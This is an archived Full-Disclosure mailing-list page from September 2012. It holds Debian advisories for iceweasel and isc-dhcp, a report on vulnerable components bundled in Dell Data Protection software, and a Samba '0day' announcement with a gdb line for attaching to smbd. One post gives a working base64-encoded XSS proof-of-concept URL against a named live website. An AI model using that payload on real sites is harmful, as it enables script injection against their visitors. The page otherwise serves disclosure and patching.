date:20120924

[Full-disclosure] [SECURITY] [DSA 2553-1] iceweasel security update

2012-09-24 Thread Moritz Muehlenhoff

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2553-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
September 24, 2012 http://www.debian.org/security/faq
- -

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-1970 CVE-2012-1972 CVE-2012-1973 CVE-2012-1974 
 CVE-2012-1975 CVE-2012-1976 CVE-2012-3959 CVE-2012-3962 
 CVE-2012-3969 CVE-2012-3972 CVE-2012-3978

Several vulnerabilities have been discovered in Iceweasel, a web
browser based on Firefox. The included XULRunner library provides
rendering services for several other applications included in Debian.

The reported vulnerabilities could lead to the execution of arbitrary
code or the bypass of content-loading restrictions via the location
object.

For the stable distribution (squeeze), these problems have been fixed in
version 3.5.16-18.

For the testing distribution (wheezy), these problems have been fixed in
version 10.0.7esr-2.

For the unstable distribution (sid), these problems have been fixed in
version 10.0.7esr-2.

We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBglasACgkQXm3vHE4uyloMjwCcDXD8phU6TcMl7mr924seM/CO
8RYAn0HEKhLsKierDXDn+ErNLzv+u6sp
=AIOu
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] giochionline.ilgiornale.it is vulnerable to base64 xss

2012-09-24 Thread tig3rhack

giochionline.ilgiornale.it is vulnerable to attack base64 xss below the POC:

http://giochionline.ilgiornale.it/wp-content/plugins/special-recent-posts/lib/phpimage.php?file=dW5kZWZpbmVkMTxTY1JpUHQgPnByb21wdCg5MjExMTUpPC9TY1JpUHQ%2b&height=100&rotation=no&width=100

info:
http://tig3rblog.wordpress.com/2012/09/24/giochionline-ilgiornale-it-is-vulnerable-to-base64-xss/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] "Dell Data Protection | Access" for Windows contains and installs outdated, superfluous and vulnerable system components and 3rd party components/drivers

2012-09-24 Thread Stefan Kanthak

Hi @ll

the current version of Dell's Data Protection | Access (DDPA) software for
Windows (Build 2.2.3.008 from 2012-06-14, released August 2012) contains
and installs several outdated, superfluous and vulnerable Windows system
components as well as outdated and vulnerable 3rd party components and drivers.



>From the readme.txt:

| Dell Data Protection | Access (DDP|A) is an integrated end point security
| management suite, providing for seamless data security and authentication.
| It allows you to authenticate using a fingerprint, smartcard, contactless
| smartcard or password. Pre-Windows can be configured to unlock self-encrypting
| drives upon authentication.


The outdated, superfluous and vulnerable components (incomplete):

#1. "Microsoft MSXML Parser.msi"version 6.0 from 2005-09-09

 All versions of Windows supported by DDP|A include a newer version
 of MSXML 6.0, the latest update/security fix cf.
 


#2. "Microsoft Root Certificate Update October 2010\rootsupd.exe"

The current Microsoft root certificate update is from April 2012,
cf. 


#3. "Microsoft Visual Studio Runtimes\vcredist_x86.exe"
 version 9.0.30729.17 from 2008-08-08

For the current Microsoft Visual C++ 2008 Redistributable Package
cf. 


#4. "Microsoft CCID Smartcard Reader for XP\usbccid.sys"
 version 5.2.3790.2444 from 2005-05-17

The installer package for DDP|A but includes the hotfix
"WindowsXP-KB967048-v2-x86-ENU.exe" with the current version of
this driver: 5.2.3790.4476, 2009-03-17


#5. "AuthenTec AES2810 Fingerprint Reader\AT8MinFoose.msi"
 version 8.4.4.39 from 2012-02-02

Cf. 



#6. "UPEK TouchChip Fingerprint Reader\UPEK_Touchchip.msi"
 version 5.9.4.6685 from 2010-09-15

Cf. 


This driver package contains parts of OpenSSL (no version specified),
it installs a textfile "OpenSSL license" from 2006-06-14!
So: add OpenSSL to the list of vulnerable components too.


#7. "UPEK TouchChip Fingerprint Reader PBA Support\spba.msi"
  version 5.9.4.6901 from 2010-??-??

This package contains a vulnerable MSVCRT+ 2005 runtime (version
8.0.50727.762)

Cf. 

This driver package contains parts of OpenSSL (no version specified),
it installs a textfile "OpenSSL license" from 2006-06-14!
So: add OpenSSL to the list of vulnerable components too.


#8. "Preboot Manager.msi" version 03.02.00.119 from 2011-12-06
  by Wave Systems Corp.

This package contains a vulnerable MSXML 4.0 SP2 (version 4.20.9818.0
from 2003-04-18).
Cf. 

This package contains a VTAPI.DLL (version 5.6.0.3239 from 2006-11-13)
from UPEK Inc. (see #6 and #7 above) which contains parts of OpenSSL.
So: yet another component with vulnerable OpenSSL code.

JFTR: no textfile with the "OpenSSL license" included here.


#9. "NTRU CryptoSystems TCG Software Stack\NTRU-CTSS-v1.2.1.37-eu.msi"
  version 1.2.1.37 from 2011-10-08
  by NTRU CryptoSystems Inc.

This package contains a vulnerable MSVCRT++ 2010 (version 10.0.30319.1
from 2010-03-18), cf.



... and more (I stopped counting)!


Dell Inc.: Don't you have any QA? Can't afford one?
UPEK Inc.: Don't you have any QA? Can't afford one?
Wave Corp.: Don't you have any QA? Can't afford one?
NTRU Inc.: Don't you have any QA? Can't afford one?

What about just a little bit of serious software engineering and due
diligence in your development, build and production processes?

It's a stupid idea to build security software from vulnerable components!


Stefan Kanthak


Timeline


2012-08-24informed vendor support

2012-09-24no reaction/reply from vendor support, report published

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] samba exploit - remote root colonel 0day

2012-09-24 Thread paul . szabo

Dear KD,

> Massive 0day hide all your printers.
> http://pastebin.com/AwpsBWVQ

That webpage says:
  ... targets = ... "samba_3.6.3-debian6" ...
(and older), and CVE-2012-1182 was fixed in 3.6.4 in April. Does this
issue affect current Samba 3.6.8?

Thanks, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of SydneyAustralia

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2551-1] isc-dhcp security update

2012-09-24 Thread Nico Golde

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2551-1   secur...@debian.org
http://www.debian.org/security/Nico Golde
September 23, 2012 http://www.debian.org/security/faq
- -

Package: isc-dhcp
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-3955

Glen Eustace discovered that the ISC DHCP server, a server for automatic
IP address assignment, is not properly handling changes in the expiration
times of a lease.  An attacker may use this flaw to crash the service
and cause denial of service conditions, by reducing the expiration time
of an active IPv6 lease.

For the stable distribution (squeeze), this problem has been fixed in
version 4.1.1-P1-15+squeeze8.

For the testing distribution (wheezy), this problem has will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 4.2.4-2.


We recommend that you upgrade your isc-dhcp packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlBfii8ACgkQHYflSXNkfP+K4QCgnL59/MBU92OBA5Z2owj8pkFM
EVoAmQFqFyPsDn33SQV9xPW7Igk2v/4t
=dS6M
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] samba exploit - remote root colonel 0day

2012-09-24 Thread kd


Massive 0day hide all your printers.

http://pastebin.com/AwpsBWVQ

*# finding targets 4 31337z:*# gdb /usr/sbin/smbd  `ps auwx | grep
smbd | grep -v grep | head -n1 | awk '{ print $2 }'`  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2553-1] iceweasel security update

[Full-disclosure] giochionline.ilgiornale.it is vulnerable to base64 xss

[Full-disclosure] "Dell Data Protection | Access" for Windows contains and installs outdated, superfluous and vulnerable system components and 3rd party components/drivers

Re: [Full-disclosure] samba exploit - remote root colonel 0day

[Full-disclosure] [SECURITY] [DSA 2551-1] isc-dhcp security update

[Full-disclosure] samba exploit - remote root colonel 0day

6 matches

Site Navigation

Mail list logo

Footer information